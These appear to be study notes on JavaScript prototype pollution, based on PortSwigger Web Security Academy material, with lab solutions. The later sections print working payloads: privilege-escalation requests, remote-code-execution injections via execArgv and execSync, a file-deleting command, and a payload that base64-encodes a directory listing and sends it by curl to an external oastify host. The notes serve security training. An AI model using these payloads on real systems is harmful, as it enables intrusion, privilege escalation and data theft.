# Prototype pollution

## **What is prototype pollution?**

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.

Although prototype pollution is often unexploitable as a standalone vulnerability, it lets an attacker control properties of objects that would otherwise be inaccessible. If the application subsequently handles an attacker-controlled property in an unsafe way, this can potentially be chained with other vulnerabilities. In client-side JavaScript, this commonly leads to DOM XSS, while server-side prototype pollution can even result in remote code execution.

## **JavaScript prototypes and inheritance**

[JavaScript prototypes and inheritance | Web Security Academy](https://portswigger.net/web-security/prototype-pollution/javascript-prototypes-and-inheritance)

## How do prototype pollution vulnerabilities arise

Successful exploitation of prototype pollution requires the following key components:

- [A prototype pollution source](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-sources) - This is any input that enables you to poison prototype objects with arbitrary properties.
- [A sink](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-sinks) - In other words, a JavaScript function or DOM element that enables arbitrary code execution.
- [An exploitable gadget](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-gadgets) - This is any property that is passed into a sink without proper filtering or sanitization.

### Prototype pollution sources

A prototype pollution source is any user-controllable input that enables you to add arbitrary properties to prototype objects. The most common sources are as follows:

- The URL via either the query or fragment string (hash)
    - `https://vulnerable-website.com/?__proto__[evilProperty]=payload`
- JSON-based input
    
    ```json
    {
        "__proto__": {
            "evilProperty": "payload"
        }
    }
    ```
    
- Web messages

### Prototype pollution sinks

A prototype pollution sink is essentially just a JavaScript function or DOM element that you’re able to access via prototype pollution, which enables you to execute arbitrary JavaScript or system commands.

### Prototype pollution gadgets

A gadget provides a means of turning the prototype pollution vulnerability into an actual exploit. This is any property that is:

- Used by the application in an unsafe way, such as passing it to a sink without proper filtering or sanitization.
- Attacker-controllable via prototype pollution. In other words, the object must be able to inherit a malicious version of the property added to the prototype by an attacker.

## Client-side prototype pollution

### Finding client-side prototype pollution sources using DOM Invader

Finding prototype pollution sources manually can be a fairly tedious process. Instead, we recommend using DOM Invader, which comes preinstalled with Burp’s built-in browser. **DOM Invader** is able to automatically test for prototype pollution sources as you browse, which can save you a considerable amount of time and effort.

For more information, check out [Scanning for prototype pollution gadgets with DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution#scanning-for-prototype-pollution-gadgets).
        

### Bypassing flawed key sanitization

An obvious way in which websites attempt to prevent prototype pollution is by sanitizing property keys before merging them into an existing object. However, a common mistake is failing to recursively sanitize the input string. For example, consider the following URL:

`vulnerable-website.com/?__pro__proto__to__.gadget=payload`

If the sanitization process just strips the string `__proto__` without repeating this process more than once, this would result in the following URL, which is a potentially valid prototype pollution source:

`vulnerable-website.com/?__proto__.gadget=payload`

### Prototype pollution in external libraries

As we've touched on already, prototype pollution gadgets may occur in third-party libraries that are imported by the application. In this case, we strongly recommend using DOM Invader's prototype pollution features to identify sources and gadgets. Not only is this much quicker, it also ensures you won't miss vulnerabilities that would otherwise be extremely tricky to notice.

### **Prototype pollution via browser APIs**

[Prototype pollution via browser APIs | Web Security Academy](https://portswigger.net/web-security/prototype-pollution/client-side/browser-apis)

## Server-side prototype pollution

### **Detecting server-side prototype pollution via polluted property reflection**

`POST` or `PUT` requests that submit JSON data to an application or API are prime candidates for this kind of behavior, as it's common for servers to respond with a JSON representation of the new or updated object. In this case, you could attempt to pollute the global `Object.prototype` with an arbitrary property as follows:

```json
POST /user/update HTTP/1.1
Host: vulnerable-website.com

...
{
    "user":"wiener",
    "firstName":"Peter",
    "lastName":"Wiener",
    "__proto__":{
        "foo":"bar"
    }
}
```

If the website is vulnerable, your injected property would then appear in the updated object in the response:

```json
HTTP/1.1 200 OK
...
{
    "username":"wiener",
    "firstName":"Peter",
    "lastName":"Wiener",
    "foo":"bar"
}
```

In rare cases, the website may even use these properties to dynamically generate HTML, resulting in the injected property being rendered in your browser.

Any features that involve updating user data are worth investigating as these often involve merging the incoming data into an existing object that represents the user within the application. If you can add arbitrary properties to your own user, this can potentially lead to a number of vulnerabilities, including privilege escalation. 

## Detecting server-side prototype pollution without polluted property reflection

Most of the time, even when you successfully pollute a server-side prototype object, you won't see the affected property reflected in a response. Given that you can't just inspect the object in a console either, this presents a challenge when trying to tell whether your injection worked.

One approach is to try injecting properties that match potential configuration options for the server. You can then compare the server's behavior before and after the injection to see whether this configuration change appears to have taken effect. If so, this is a strong indication that you've successfully found a server-side prototype pollution vulnerability.

In this section, we'll look at the following techniques:

- [Status code override](https://portswigger.net/web-security/prototype-pollution/server-side#status-code-override)
- [JSON spaces override](https://portswigger.net/web-security/prototype-pollution/server-side#json-spaces-override)
- [Charset override](https://portswigger.net/web-security/prototype-pollution/server-side#charset-override)

## Scanning for server-side prototype pollution sources

Although it's useful to try manually probing for sources in order to solidify your understanding of the vulnerability, this can be repetitive and time-consuming in practice. For this reason, we've 
created the [Server-Side Prototype Pollution Scanner](https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8) extension for Burp Suite, which enables you to automate this process.

## Bypassing input filters for server-side prototype pollution

Websites often attempt to prevent or patch prototype pollution vulnerabilities by filtering suspicious keys like `__proto__`.

This key sanitization approach is not a robust long-term solution as there are a number of ways it can potentially be bypassed. For example, an attacker can:

- Obfuscate the prohibited keywords so they're missed during the sanitization. For more information, see [Bypassing flawed key sanitization](https://portswigger.net/web-security/prototype-pollution/client-side#bypassing-flawed-key-sanitization).
- Access the prototype via the constructor property instead of `__proto__`. For more information, see [Prototype pollution via the constructor](https://portswigger.net/web-security/prototype-pollution/client-side#prototype-pollution-via-the-constructor)

Node applications can also delete or disable `__proto__` altogether using the command-line flags `--disable-proto=delete` or `--disable-proto=throw` respectively. However, this can also be bypassed by using the constructor technique.

### **Remote code execution via server-side prototype pollution**

Pollute the prototype in a way that causes an interaction with Burp Collaborator whenever a new Node process is created:

```json
"__proto__": {
    "shell":"node",
    "NODE_OPTIONS":"--inspect=YOUR-COLLABORATOR-ID.oastify.com\"\".oastify\"\".com"
}
```

Execute Arbitrary Commands

```json
"__proto__": {
    "execArgv":[
        "--eval=require('child_process').execSync('curl https://YOUR-COLLABORATOR-ID.oastify.com')"
    ]
}
```

Execute Arbitrary Commands using Shell/Input

```json
"__proto__": {
    "shell":"vim",
    "input":":! ls /home/carlos | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"
}
```

### Labs

[DOM XSS via client-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-dom-xss-via-client-side-prototype-pollution)

`DOM Invader -> Prototype Pollution is on -> Scan for gadgets -> Exploit`

[DOM XSS via an alternative prototype pollution vector](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-dom-xss-via-an-alternative-prototype-pollution-vector)`)};alert(1);//`

`DOM Invader -> Prototype Pollution is on -> Scan for gadgets -> Exploit`

`Modify payload to **)};alert(1);//** to escape IF function and trigger alert`

[Client-side prototype pollution via flawed sanitization](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-client-side-prototype-pollution-via-flawed-sanitization)

`DOM Invader -> Prototype Pollution is on -> Scan for gadgets -> Exploit`

[Client-side prototype pollution in third-party libraries](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-client-side-prototype-pollution-in-third-party-libraries)

`DOM Invader -> Prototype Pollution is on -> Scan for gadgets -> Exploit`

[Client-side prototype pollution via browser APIs](https://portswigger.net/web-security/prototype-pollution/client-side/browser-apis/lab-prototype-pollution-client-side-prototype-pollution-via-browser-apis)

`DOM Invader -> Prototype Pollution is on -> Scan for gadgets -> Exploit`

[Privilege escalation via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-privilege-escalation-via-server-side-prototype-pollution)

```markdown
# Update the profile and notice returned parameter "isAdmin":false
# Inject with server-side prototype pollution and set the isAdmin value to true
POST /my-account/change-address HTTP/2
Host: ID.web-security-academy.net

...

{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "93WCAV3dNX9g0CvPoexBHujlc58eRC9Z",
  "__proto__": {
    "isAdmin": "true"
  }
}
```

[Detecting server-side prototype pollution without polluted property reflection](https://portswigger.net/web-security/prototype-pollution/server-side/lab-detecting-server-side-prototype-pollution-without-polluted-property-reflection)

```markdown
# Update the profile and notice that property isn't reflected in response.
# The following request return address_line_1 parameter with the foo value.

POST /my-account/change-address HTTP/2
Host: ID.web-security-academy.net

...

{
  "address_line_1": "+AGYAbwBv-",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "jc7vj97qIwxkTaK71Ldv6JRAWJSvaSEK",
  "__proto__": {
    "content-type": "application/json; charset=utf-7"
  }
}
```

[Bypassing flawed input filters for server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-bypassing-flawed-input-filters-for-server-side-prototype-pollution)

```markdown
# Update the profile and notice the returned parameter "isAdmin":false
# Access the prototype via the constructor property to bypass the filter.

POST /my-account/change-address HTTP/2
Host: ID.web-security-academy.net

...

{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "3toSybjEQXPE23wqNrfgGKrGpWB7s69Q",
  "constructor": {
    "prototype": {
      "isAdmin": true
    }
  }
}
```

[Remote code execution via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-remote-code-execution-via-server-side-prototype-pollution)

```markdown
# Update the profile 
# Use a malicious execArgv property that adds the --eval argument to the        spawned child process
POST /my-account/change-address HTTP/2
Host: ID.web-security-academy.net

...

{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "fbB3zss1Q2KlN0NiR1rpwYMvNa8hTFY4",
  "__proto__": {
    "execArgv": [
      "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"
    ]
  }
}
```

[Exfiltrating sensitive data via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-exfiltrating-sensitive-data-via-server-side-prototype-pollution)

```markdown
# Update the profile 
# Polluting the prototype with a set of malicious properties that control the options passed to the child_process.execSync() method
{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "Bun6cVxHrelGKMhHXWDJoe7ml3WxnjFA",
  "__proto__": {
    "shell": "vim",
    "input": ":! ls /home/carlos | base64 | curl -d @- dr81g9v8fo4647tpux2jt8dx7odf15pu.oastify.com\n"
  }
}
```